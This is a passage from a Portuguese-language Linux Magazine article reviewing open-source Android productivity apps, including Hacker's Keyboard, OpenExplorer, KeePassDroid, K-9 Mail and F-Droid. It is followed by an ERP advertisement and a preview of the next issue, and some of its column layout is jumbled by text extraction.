artigos e códigos. Naturalmente,
este processo requer que o usuá-
rio possua os aplicativos apropria-
dos instalados em seu dispositivo
Android, mas a abundância da alta
qualidade de aplicativos de código
aberto também estão à disposi-
ção para este fim. Neste artigo,
examinaremos vários excelentes
aplicativos de código aberto que
podem transformar um dispositi-
vo Android em uma máquina de
produtividade poderosa e versátil.
Ferramentas
do sistema
A maioria dos teclados virtuais
para Android são otimizados
para a entrada de texto rápida e
eficiente, às custas de determi-
nados recursos. Alguns teclados,
por exemplo, acabaram com a
tecla Tab, que é essencial para
trabalhar em terminais. Outros
teclados não possuem setas dedi-
cadas, o que torna difícil selecio-
nar textos e mover o cursor. Além
disso, quase nenhum dos teclados
disponíveis possuem teclas de
função dedicadas. Para resolver
o problema, use o Hacker’s Key-
board [1], um teclado de substi-
tuição que reproduz o layout do
teclado regular, por isso é ideal
para os usuários que dependem
das teclas de seta, Tab, Esc, e ou-
tros recursos em sua computação
diária. Melhor ainda, o Hacker’s
Keyboard apresenta a tecla Fn,
que evoca um layout separado,
contendo um teclado numérico
e um teclado de função.
O Hacker’s Keyboard também
pode controlar vários layouts de
teclado, e o usuário pode facil-
mente alternar entre eles usando a
tecla de espaço. O teclado suporta
o recurso de completar palavras e
dicionários deste tipo estão dis-
poníveis para vários idiomas (o
dicionário de inglês vem incluso
por padrão). O Hacker’s Keyboard
também contempla uma interfa-
ce de configuração dedicada que
permite ativar o teclado, instalar
dicionários adicionais e ajustar as
opções de teclado (figura 1).
Um dispositivo Android sem
um gerenciador de arquivos ade-
quado é tão útil como uma roda
quadrada. Felizmente, o usuário
Figura 1 O Hacker’s Keyboard permite habilitar e configurar o teclado.
tem à disposição vários gerencia-
dores em código aberto para es-
colher, incluindo o OpenExplorer
e o Ghost Commander. O OpenEx-
plorer [2] ostenta uma interface
elegante que funciona bem em
praticamente qualquer tela, e
o gerenciador de arquivos vem
com uma série de recursos úteis
(figura 2). O OpenExplorer pode
lidar com servidores remotos e o
gerenciador de arquivos suporta
o popular FTP, SFTP e protocolos
Samba (figura 3). Melhor ainda, o
OpenExplorer também suporta
serviços de armazenamento em
nuvem, incluindo Box, Dropbox
e Google Drive.
A capacidade de lidar com ser-
vidores remotos é apenas um dos
muitos talentos do OpenExplorer.
O gerenciador de arquivos tam-
bém vem com um editor de texto
embutido que permite visualizar
e modificar arquivos de texto. Em
dispositivos Android rooteados

68 www.linuxmagazine.com.br

Figura 2 O OpenExplorer é um gerenciador de arquivos que con-
templa uma ampla gama de recursos úteis.
(com as permissões administrati-
vas desbloqueadas), o gerenciador
de arquivos fornece leitura/escrita
aos diretórios do sistema, e o apli-
cativo permite ao usuário navegar
e extrair arquivos em formatos po-
pulares, incluindo ZIP, TAR, TRGZIP,
TBZIP2 e 7ZIP. O recurso Favoritos
do OpenExplorer permite marcar
as pastas mais usados para aces-
so rápido. Por fim, o gerenciador
de arquivos suporta as chamadas
pastas inteligentes, que oferecem
acesso conveniente a fotos, vídeos,
música e downloads.
O OpenExplorer é um geren-
ciador de arquivos competente,
mas se o usuário preferir a efi-
ciência de um gerenciador de
arquivos de painel duplo, então
o Ghost Commander [3] é o mais
recomendado (figura 4). A inter-
face do Ghost Commander tor-
na extremamente fácil trabalhar
com arquivos e atalhos numéricos
permitem executar operações
comuns com um simples toque
de tecla (o que é útil se o usuá-
rio utilizar um teclado físico com
o dispositivo Android). O Ghost
Commander pode lidar com o
protocolo FTP diretamente fora
da caixa, mas é possível adicionar
suporte ao Samba e SFTP com a
instalação de plugins opcionais.
Semelhante ao OpenExplorer, o
Ghost Commander fornece aces-
Linux Magazine #XX | Mês de 200X
so de leitura/escrita a pastas do
sistema em dispositivos Android
rooteados, e recurso Favoritos do
gerenciador de arquivos pode vir a
calhar para adicionar os diretórios
utilizados com mais frequência.
O KeePass é uma ótima fer-
ramenta para armazenar e ge-
renciar senhas no desktop Li-
nux, e o KeePassDroid [4] é um
companheiro perfeito para ela
(figura 5). Com este aplicativo,
o usuário pode utilizar um ban-
co de dados de senha KeePass
em um dispositivo Android. O
aplicativo pode abrir bancos de
dados existentes, tanto em for-
matos KDB mais antigos como
formatos KDBX mais recentes, e
Figura 3 OpenExplorer suporta protocolos populares e serviços de
armazenamento em nuvem
pode usar o aplicativo para criar
novos bancos de dados (ainda
que somente no formato KDB).
Como o aplicativo de desktop,
o KeePassDroid pode lidar com
bancos de dados protegidos com
um arquivo de chave. Quando
abrimos um registro de banco de
dados no KeePassDroid, o apli-
cativo convenientemente copia
o nome de usuário e senha para
a área de transferência, tornan-
do mais fácil inserir os dados de
login em um formulário web.
Mais importante ainda, o apli-
cativo abre automaticamente a
área de transferência após um
determinado período de tempo
para melhor segurança.
Gerenciadores
de tarefas
Gerenciadores de tarefas e ferra-
mentas de anotações são a parte
mais importante da produtividade
em qualquer plataforma, e o An-
droid não é exceção. Quando se
trata de tarefas e gerenciadores, o
usuário pode escolher entre vários
aplicativos. O simpleDeadlines [5],
por exemplo, é um aplicativo de ge-
renciamento de tarefas para usuá-
rios que valorizam a simplicidade.
69
 também suporta lembretes base-
ados em localização, que disparam
notificações quando o usuário se
encontra em um local específico.
O aplicativo salva continuamente
notas novas e modificadas, e ofe-
rece o recurso Time machine, que
permite visualizar todas as ver-
sões anteriores de uma anotação
específica. Mais importante ainda,
o NotePad suporta sincronização
através do serviço Google Tasks,
assim o usuário pode manter notas
Figura 4 A interface de painel duplo do Ghost Explorer facilita o e tarefas sincronizados entre múl-
trabalho com arquivos e diretórios. tiplos dispositivos e plataformas.
Como o nome sugere, o aplicativo listas e transformar uma nota em
é particularmente adequado para
manter o controle sobre prazos,
uma tarefa atribuindo um prazo
e um lembrete para ela. Embora
Gerenciamento
por isso pode ser uma ferramenta não seja possível atribuir uma prio- de email
indispensável para qualquer pessoa ridade para as tarefas, é possível Quando se trata de escolher um
que lida diariamente com prazos reorganizá-las, arrastando-as para cliente de email para uso com o
de todos os tipos (figura 6). cima e para baixo. dispositivo Android, poucos são
O simpleDeadlines é, na verda- Além de lembretes regulares de tão bons quanto o K-9 Mail [8].
de, simples. Ele permite que criar tempo, o NoNonsense NotePad Na verdade, este deve ser um dos
tarefas, atribuir datas de vencimen-
to para elas e organizar as tarefas
criadas em grupos. O aplicativo
atribui um código de cores para
cada tarefa com base na proximi-
dade do prazo de vencimento. Por
exemplo, todos os prazos vencidos
e futuros possuem um rótulo na
cor vermelha, prazos a vencer são
marcados com a cor laranja, e as-
sim por diante. Em cada boot, o
simpleDeadlines exibe uma noti-
ficação contendo a contagem de
prazo para cada código de cores. O
programa também funciona com
o aplicativo DashClock Widget [6],
que permite visualizar os prazos
na tela de bloqueio.
Se o usuário estiver procurando
por algo mais avançado do que o
simpleDeadlines, então poderá se
interessar pelo NoNonsense No-
tePad [7]. Este aplicativo híbrido
combina gerenciamento de tarefas
com o recurso de anotações, dis-
pondo de uma interface elegante e
amigável ao usuário (figura 7). Com Figura 5 KeePassDroid é um aplicativo útil para o gerenciamento de
ele é possível organizar notas em senhas no Android.

70 www.linuxmagazine.com.br

Figura 6 SimpleDeadlines é um aplicativo sem frescuras para manter
o controle sobre prazos.
Figura 7 NoNonsense NotePad pode lidar com tarefas e anotações.
aplicativos amigáveis ao usuário
mais poderosos da plataforma
Android. O K-9 Mail suporta múl-
tiplas contas de email, e o assis-
tente de configuração de conta
torna o processo de adicionar
contas algo muito simples (figu-
ra 8). O assistente suporta ser-
viços de email populares, como
o Gmail, Yahoo! Mail e FastMail,
então se o usuário possui uma
conta com qualquer um destes
Figura 8 O K-9 Mail é possivelmente o cliente de email mais potente
e versátil para Android.
Linux Magazine #XX | Mês de 200X
serviços, poderá adicioná-la ao
K-9 Mail em questão de segun-
dos. Basta fornecer o endereço
de email e senha que o aplicativo
se encarregará do resto.
K-9 Mail apresenta a Unified
Inbox, que permite gerenciar
emails de todas as contas em
um só lugar. A interface do apli-
cativo empresta algumas ideias
do Gmail, incluindo a capacidade
de visualizar emails como tópicos
de conversação. Os comandos
no menu de contexto permitem
processar email de forma rápida
e eficiente: o usuário pode, por
exemplo, pressionar por alguns
poucos segundos um item do e-
-mail para respondê-lo, encami-
nhá-lo, marcá-lo como não lido,
movê-lo para outra pasta, e as-
sim por diante. O comando More
from this sender exibe todas as
mensagens de email recentes do
remetente. O K-9 Mail suporta
múltiplas identidades, também,
o que pode vir a calhar para uso
com aliases de email. Outros re-
cursos de praxe, como anexos,
assinaturas, pesquisa, classifi-
cação e outros confortos estão
presentes e podem ser levados
em conta na avaliação positiva
do programa.
Um leitor de ebook, como o
aplicativo FBReader, é outro apli-
cativo útil para maximizar a pro-
dutividade do usuário. O aplica-
tivo suporta vários formatos de
ebook populares, incluindo o
EPUB, MOBI, FB2 e TXT. O apli-
cativo fornece acesso direto a
diversos catálogos de ebooks
online (por exemplo, Smashwords
e Feedbooks), para que o usuário
possa navegar, comprar e baixar
ebooks diretamente do leitor. É
possível adicionar catálogos per-
sonalizados também, e o recurso
pode ser útil para transferir ebooks
de conexões sem fio [10] a partir
da suite de ebook Calibre.
Graças a uma ampla gama de
opções configuráveis, o FBReader
é infinitamente personalizável
(figura 9). É possível ajustar pra-
ticamente todos os aspectos do
aplicativo: das fontes (o aplicati-
vo pode usar a fonte TrueType)
e temas, ao espaçamento entre
linhas e efeito de transição de
página. Claro, o aplicativo apre-
senta os confortos habituais,
como pesquisa e favoritos.
71

Figura 9 O FBReader é um leitor de ebook infinitamente personali-
zável e suporta vários formatos de ebook.
É possível marcar uma página
inteira ou seleção de texto; assim,
o usuário pode utilizar o recur-
so de bookmarking para salvar
trechos de texto. O FBReader
também permite realizar outras
ações sobre o texto selecionado
usando um menu pop-up. Pode-
mos destacar a seleção aplicando
uma cor a ela e compartilhando
o trecho selecionado via recur-
so de compartilhamento do An-
droid. A caixa de ferramentas de
produtividade do leitor estaria
incompleta sem um editor de
texto, e se o usuário estiver
em busca de um editor de tex-
to que possa ser usado tanto
para editar como criar código,
o 920 Text Editor [10] é o apli-
Figura 10 920Text Editor é bom para escrever e codificar. Dmitri Popov.
72
cativo mais indicado (figura 10).
Ele suporta destaque de sintaxe
para muitas linguagens de pro-
gramação populares, incluin-
do Java, JavaScript, Perl, PHP,
Python, Bash e muitas outras.
Além disso, o editor pode lidar
com uma ampla gama de codi-
ficações, e reúne uma enorme
quantidade de características
úteis: do recurso de procurar e
substituir à indentação e supor-
te para várias janelas.
Conclusão
Muitos outros aplicativos de có-
digo aberto estão disponíveis e
podem se tornar úteis para o au-
mento da produtividade da caixa
de ferramentas do usuário. Mas,
como encontrá-los? A maneira
mais fácil de descobrir e instalar
o software de código aberto em
um dispositivo Android é usando
o F-Droid [11], que fornece uma
alternativa de código aberto ao
serviço da loja do Google Play. O
F-Droid permite ver alguns dos
aplicativos disponíveis por cate-
gorias, instalá-los, e até mesmo
obter o código fonte. Apesar do
F-Droid não contemplar suporte
a imagens, avaliações e comen-
tários, o aplicativo convenien-
temente fornece links para a
maioria dos aplicativos do Google
Play Store, onde o usuário pode
deixar seu feedback. n
Gostou do artigo?
Queremos ouvir sua opinião.
Fale conosco em:
cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/9024
Mais informações
[1] N7Player: https://play.google.
com/store/apps/details?id=com.
n7mobile.nplayer
[1] Hacker’s Keybo-
ard: http://code.google.
com/p/hackerskeyboard
[2] OpenExplorer: http://
brandroid.org/open
[3] Ghost Commander:
http://sites.google.com/
site/ghostcommander1
[4] KeePassDroid: http://
www.keepassdroid.com
[5] SimpleDeadlines: github.
com/chibibi/simpleDeadlines
[6] DashClock Widget: code.
google.com/p/dashclock
[7] NoNonsense NotePad: github.
com/spacecowboy/NotePad
[8] K-9 Mail: code.goo-
gle.com/p/k9mail
[9] FBReader: fbreader.org
[10] 920 Text Editor: jecelyin.
github.io/920‑Text‑Editor
[11] F-Droid: https://f‑droid.org/
www.linuxmagazine.com.br
 Agora você tem o controle sobre
o desempenho do seu negócio
sempre à sua mão.

Compras Finanças

Estoques
NF-e

Vendas

Fornecedores
Clientes

A micro e pequena empresa ganha uma solução de classe

mundial de sistemas de gestão ERP no modelo comercial
com a melhor relação custo/benefício. O Kontroller
dispensa aquisição de hardware, licenças de software,
ERP – SISTEMA DE GESTÃO técnicos de suporte ou sistema de backup. Garante alta
disponibilidade e oferece fácil acesso via browser.

Saiba mais em:

Solução completa hospedada
www.vectory.com.br
em nuvem (Cloud Computing)
+55 11 3104 6652

SOFTWARE
 Preview
Linux Magazine #108
Privacidade
Na próxima edição da Linux Magazine,
você vai conhecer uma infinidde de
ferramentas para proteger suas
informações confidenciais, mantendo
a sua privacidade e seus dados longe
dos olhos de curiosos.
Conheça diversas ferramentas de
privacidade para criptografar seus
dados tanto localmente quanto na
nuvem e aprenda como navegar de
forma efetivamente anônima na
Internet, protegendo sua identidade
de eventuais bisbilhoteiros. n

Admin Magazine #11

Virtualização de Desktop
Quais são as reais vantagens de pos-
suir um desktop virtualizado? Quais
são os reais benefícios de manter a
infraestrutura de usuário virtualizada
a este nível? Estas e outras perguntas
serão repondidas na próxima edição
da Admin Magazine, onde você irá
aprender como funciona e como man-
ter uma insfraestrutura de desktops
virtualizados utilizando as mais mo-
dernas ferramentas de virtualização
disponíveis no mercado. n

82 www.linuxmagazine.com.br